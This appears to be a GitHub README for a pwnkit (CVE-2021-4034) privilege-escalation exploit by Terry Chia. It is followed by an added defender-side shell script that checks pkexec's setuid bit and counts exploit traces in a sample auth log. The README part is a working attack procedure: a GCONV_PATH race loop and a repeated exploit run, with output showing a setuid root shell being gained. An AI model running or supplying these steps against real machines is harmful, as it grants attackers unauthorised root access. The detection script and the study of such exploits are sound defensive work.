Exploit for the pwnkit vulnerability from the Qualys team

Overview

CVE-2021-4034

Exploit for the pwnkit vulnerability from the Qualys team.

This exploit assumes that gcc is present on the target machine.

$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh

Run the following command in one bash session:

while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done

Run the following command in another bash session:

while :; do ./exploit; done

You will eventually win the race and obtain a shell binary that gives you root access:

$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
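A defender-side companion to the procedure above, added here and not part of this repository: a POSIX shell script that checks whether pkexec still carries the setuid bit the exploit depends on (the Qualys advisory's interim mitigation is to clear it) and counts the "SHELL variable was not found" message that pkexec writes to the auth log when the exploit drives it through its error path, which the advisory names as the trace this technique leaves. The log format and sample lines are constructed for the example; the pkexec path is a parameter.

```shell
#!/bin/sh
# Added example, not part of the original repository: a defender-side check for the
# precondition the exploit above needs (a setuid-root pkexec) and a scan of auth-log
# lines for the trace pkexec leaves when it rejects the SHELL value during the attempt.
# The binary path and the sample log lines below are constructed assumptions.

# Is the binary still setuid? Exit 0 if the bit is set (exploit precondition present),
# 1 otherwise. Qualys' interim mitigation clears it: chmod 0755 /usr/bin/pkexec
pkexec_is_setuid() {
    bin="${1:-/usr/bin/pkexec}"
    [ -u "$bin" ]
}

# Count log lines carrying the SHELL-not-in-/etc/shells message. The loose pattern
# tolerates wording differences between polkit versions and log shippers.
count_pkexec_traces() {
    grep -c 'pkexec.*SHELL variable was not found.*/etc/shells' "$1" || true
}

# Write a constructed auth.log excerpt to the given path (modelled on pkexec's
# log_message format, not a capture from a real host).
write_sample_log() {
    cat > "$1" <<'EOF'
Jan 26 08:57:01 host pkexec[4242]: ayrx: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/home/ayrx] [COMMAND=GCONV_PATH=./value]
Jan 26 08:57:01 host sshd[4100]: Accepted publickey for ayrx from 10.0.0.5 port 51234 ssh2
Jan 26 08:57:02 host pkexec[4243]: ayrx: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/home/ayrx] [COMMAND=GCONV_PATH=./value]
EOF
}

# Run both checks against the local pkexec and the constructed sample log.
if pkexec_is_setuid; then
    echo "pkexec is setuid: apply the polkit patch or clear the bit"
else
    echo "pkexec is not setuid (or absent)"
fi
sample="$(mktemp)"
write_sample_log "$sample"
echo "pkexec SHELL-rejection traces in sample log: $(count_pkexec_traces "$sample")"
rm -f "$sample"
```

On a real host, point count_pkexec_traces at /var/log/auth.log (or the journal export) and treat any repeated burst of this message from one user as worth investigating.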
Owner: Terry Chia